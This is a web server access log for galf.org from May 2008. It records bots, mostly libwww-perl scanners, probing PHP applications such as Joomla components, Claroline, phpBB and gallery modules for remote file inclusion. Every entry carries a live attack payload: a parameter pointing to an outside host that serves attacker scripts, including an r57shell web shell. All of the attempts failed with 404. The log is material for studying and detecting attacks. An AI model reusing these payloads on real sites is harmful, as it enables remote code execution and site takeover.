201.12.151.34 - - [04/May/2008:17:15:03 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://bsthank.t35.com/CMDs/xigor.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
201.12.151.34 - - [04/May/2008:17:15:04 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://bsthank.t35.com/CMDs/xigor.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
201.12.151.34 - - [04/May/2008:17:15:04 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://bsthank.t35.com/CMDs/xigor.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:16:06 -0700] "GET /logs/access_070806.log/index.php?pagina=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:16:06 -0700] "GET /index.php?pagina=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:16:06 -0700] "GET /logs/index.php?pagina=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.218.85.18 - - [04/May/2008:17:16:08 -0700] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://dvl.by.ru/cmd/r57shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:16:27 -0700] "GET /logs/access_070903.log/components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.101.26.99 - - [04/May/2008:17:17:40 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.101.26.99 - - [04/May/2008:17:17:43 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
221.128.79.156 - - [04/May/2008:17:17:59 -0700] "GET /logs/http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
221.128.79.156 - - [04/May/2008:17:17:59 -0700] "GET /logs/http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.galf.org"
221.128.79.156 - - [04/May/2008:17:18:02 -0700] "GET /http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
221.128.79.156 - - [04/May/2008:17:18:02 -0700] "GET /http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.galf.org"
195.12.53.176 - - [04/May/2008:17:19:17 -0700] "GET /logs/access.log//index.php?option=com_log/modules/My_eGallery/index.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
195.12.53.176 - - [04/May/2008:17:19:18 -0700] "GET //index.php?option=com_log/modules/My_eGallery/index.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
195.12.53.176 - - [04/May/2008:17:19:18 -0700] "GET /logs//index.php?option=com_log/modules/My_eGallery/index.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
72.32.68.172 - - [04/May/2008:17:19:30 -0700] "GET /logs/access_070827.log/index.php?pagina=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.225.229.167 - - [04/May/2008:17:21:03 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
66.225.229.167 - - [04/May/2008:17:21:03 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:21:52 -0700] "GET /logs/access_070827.log/index.php?pagina=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.12.53.176 - - [04/May/2008:17:22:06 -0700] "GET /logs/access_071008.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:22:31 -0700] "GET /logs/access.log/main.php?page=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:22:31 -0700] "GET /main.php?page=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:22:32 -0700] "GET /logs/main.php?page=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.12.53.176 - - [04/May/2008:17:22:49 -0700] "GET /logs/access_070924.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.101.26.99 - - [04/May/2008:17:23:00 -0700] "GET /logs/access.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.101.26.99 - - [04/May/2008:17:23:01 -0700] "GET /logs/access.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.101.26.99 - - [04/May/2008:17:23:05 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.101.26.99 - - [04/May/2008:17:23:12 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:23:31 -0700] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.19.130 - - [04/May/2008:17:23:34 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
213.149.32.24 - - [04/May/2008:17:23:36 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
213.149.32.24 - - [04/May/2008:17:23:36 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
213.149.32.24 - - [04/May/2008:17:23:36 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
216.6.180.69 - - [04/May/2008:17:23:52 -0700] "GET /logs/access.log/main.php?page=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:23:52 -0700] "GET /main.php?page=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:23:52 -0700] "GET /logs/main.php?page=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.12.53.176 - - [04/May/2008:17:24:04 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
195.12.53.176 - - [04/May/2008:17:24:05 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
195.12.53.176 - - [04/May/2008:17:24:05 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
208.112.43.2 - - [04/May/2008:17:24:14 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
208.112.43.2 - - [04/May/2008:17:24:14 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
196.40.71.237 - - [04/May/2008:17:24:29 -0700] "GET /logs/access.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "galf.org"
196.40.71.237 - - [04/May/2008:17:24:29 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "galf.org"
72.32.68.172 - - [04/May/2008:17:25:25 -0700] "GET /logs/access_071105.log/main.php?page=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.106.18.76 - - [04/May/2008:17:25:42 -0700] "GET /index.php?p=http://www.joostmulders.nl/images/doy.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
208.116.44.60 - - [04/May/2008:17:25:52 -0700] "GET /logs/access.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
208.116.44.60 - - [04/May/2008:17:25:52 -0700] "GET /logs/access.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
208.116.44.60 - - [04/May/2008:17:25:52 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
208.116.44.60 - - [04/May/2008:17:25:52 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
208.116.44.60 - - [04/May/2008:17:25:52 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
208.116.44.60 - - [04/May/2008:17:25:52 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
66.219.101.32 - - [04/May/2008:17:26:09 -0700] "GET /logs/access.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.219.101.32 - - [04/May/2008:17:26:09 -0700] "GET /logs/access.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.219.101.32 - - [04/May/2008:17:26:09 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.219.101.32 - - [04/May/2008:17:26:09 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.219.101.32 - - [04/May/2008:17:26:09 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.219.101.32 - - [04/May/2008:17:26:09 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.116.44.60 - - [04/May/2008:17:26:41 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
208.116.44.60 - - [04/May/2008:17:26:42 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
66.219.101.32 - - [04/May/2008:17:26:46 -0700] "GET /logs/access.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.219.101.32 - - [04/May/2008:17:26:46 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.219.101.32 - - [04/May/2008:17:26:46 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.219.101.32 - - [04/May/2008:17:26:56 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.219.101.32 - - [04/May/2008:17:26:58 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.254.178.186 - - [04/May/2008:17:27:03 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
216.6.180.69 - - [04/May/2008:17:27:17 -0700] "GET /logs/access_071105.log/main.php?page=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.219.101.32 - - [04/May/2008:17:27:43 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.116.44.60 - - [04/May/2008:17:27:57 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
66.219.101.32 - - [04/May/2008:17:27:58 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.116.44.60 - - [04/May/2008:17:27:59 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
66.219.101.32 - - [04/May/2008:17:28:03 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.101.26.99 - - [04/May/2008:17:28:09 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:28:42 -0700] "GET /logs/access_071231.log/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:28:42 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:28:43 -0700] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.101.26.99 - - [04/May/2008:17:28:52 -0700] "GET /logs/access.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.101.26.99 - - [04/May/2008:17:28:52 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.101.26.99 - - [04/May/2008:17:28:52 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.101.26.99 - - [04/May/2008:17:28:54 -0700] "GET /logs/access.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.149.32.24 - - [04/May/2008:17:28:54 -0700] "GET /logs/access.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
213.149.32.24 - - [04/May/2008:17:28:54 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
213.149.32.24 - - [04/May/2008:17:28:55 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
208.101.26.99 - - [04/May/2008:17:28:58 -0700] "GET /logs/access_080114.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.101.26.99 - - [04/May/2008:17:28:59 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.101.26.99 - - [04/May/2008:17:29:02 -0700] "GET /logs/access.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.101.26.99 - - [04/May/2008:17:29:02 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.101.26.99 - - [04/May/2008:17:29:09 -0700] "GET /logs/access_080114.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.207.204.13 - - [04/May/2008:17:29:10 -0700] "GET /logs/access.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.207.204.13 - - [04/May/2008:17:29:11 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.207.204.13 - - [04/May/2008:17:29:11 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.207.204.13 - - [04/May/2008:17:29:13 -0700] "GET /logs/access.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.207.204.13 - - [04/May/2008:17:29:13 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.101.26.99 - - [04/May/2008:17:29:14 -0700] "GET /logs/access_080114.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.207.204.13 - - [04/May/2008:17:29:15 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.219.101.32 - - [04/May/2008:17:29:18 -0700] "GET /logs/access.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.219.101.32 - - [04/May/2008:17:29:18 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.219.101.32 - - [04/May/2008:17:29:18 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.116.44.60 - - [04/May/2008:17:29:19 -0700] "GET /logs/access.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
208.116.44.60 - - [04/May/2008:17:29:19 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
208.116.44.60 - - [04/May/2008:17:29:19 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
64.207.204.13 - - [04/May/2008:17:29:27 -0700] "GET /logs/access.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.207.204.13 - - [04/May/2008:17:29:27 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.207.204.13 - - [04/May/2008:17:29:28 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.101.26.99 - - [04/May/2008:17:29:50 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.203.209.2 - - [04/May/2008:17:30:01 -0700] "GET /logs/access.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.203.209.2 - - [04/May/2008:17:30:02 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.203.209.2 - - [04/May/2008:17:30:02 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:30:02 -0700] "GET /logs/access_080113.log/modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
